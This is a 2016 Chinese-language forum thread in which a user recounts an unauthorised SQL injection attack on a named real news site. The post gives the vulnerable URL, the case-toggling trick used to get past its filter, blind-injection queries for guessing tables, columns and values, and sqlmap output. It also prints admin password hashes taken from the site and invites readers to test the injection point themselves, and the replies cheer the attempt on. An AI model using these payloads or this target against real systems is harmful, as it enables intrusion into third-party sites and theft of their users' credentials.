一次不成功的渗透,手工注入
发现一个站,有注入漏洞,虽然有WAF,但是可大小写绕过---------------------------------------------------------------------------
url : http://www.smnews.com.cn/special/2012hyjj/shows.asp?id=30
---------------------------------------------------------------------------
貌似还是图片发不出来。。好尴尬-_-!!!
注入点放出来了自己测试吧,利用大小写绕过,,顺便练练手工查询吧^_^
--蛋疼的要死,防注入把我用到的字符串都给过滤了,,包括admin。password的啊:)还好能绕过
order by 一直返回错误所以不能联合查询,可使用半猜解查询
下面是几句我经常用的查询语句
and+(select+count(*)+from+admin)>0 查询表名
and+(select+count(列名)from+admin)>0 查询列名并得到有几条数据
and+(select+top+1+len(username)+from+admin)>0 查询数据长度
and+1=(select+top+1+count(*)+from+manage_user+where+Asc(mid+(username,1))=100)获取数据的值
获取数据值时可以借助burpsuite抓包以及它的intruder模块自动检测。
-------------------------------------------------------------------------
另:使用sqlmap工具进行注入
楼主测试时sqlmap检测到该url含有注入漏洞了,绕过了WAF
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=30 AND 7962=7962
---
然而获取表的时候却成了这样子
------
no table found
tables: '{}'
-------------
感到了深深的恶意:)
于是想到大小写绕过,利用上边手工注入猜解到的表名列名,直接-T -C --dump得到数据
+-------------------------------------------+----------
| admin | 17525e8d1ef0030fc7bb6c7357f4e181 |
| vjia | 21b95a0f90138767b0fd324e6be3457b|
+-------------------------------------------+----------
---------------------------------
这应该是个分站,主站是dz-php环境,这个站是asp,显然这里得到的数据并不会登录主站。这个分站的后台我也没扫出来。。额,,该再找个字典了,,
没进入后台,这次不成功的渗透,分享给大家,再练一练手工注入,毕竟工具只是简化操作过程,提高效率,然知道工具的原理才能更好的运用。
--by 黎夕
小伙子可以,继续努力 大小写可以绕过。
oRdEr by 我俩一样唉,我也把的发出来大家指正一下 支持一个。
RE: 一次不成功的渗透,手工注入
wuyan 发表于 2016-5-27 08:42小伙子可以,继续努力
恩恩,会努力的!
RE: 一次不成功的渗透,手工注入
90_ 发表于 2016-5-27 09:52大小写可以绕过。
oRdEr by
是可以绕过,order by 0 依然返回错误爆不出有几个字段,
RE: 一次不成功的渗透,手工注入
haxer 发表于 2016-5-27 12:17我俩一样唉,我也把的发出来大家指正一下
一起努力!
RE: 一次不成功的渗透,手工注入
w2015 发表于 2016-5-27 12:22支持一个。
谢谢!一起努力 厉害厉害!
页:
[1]
2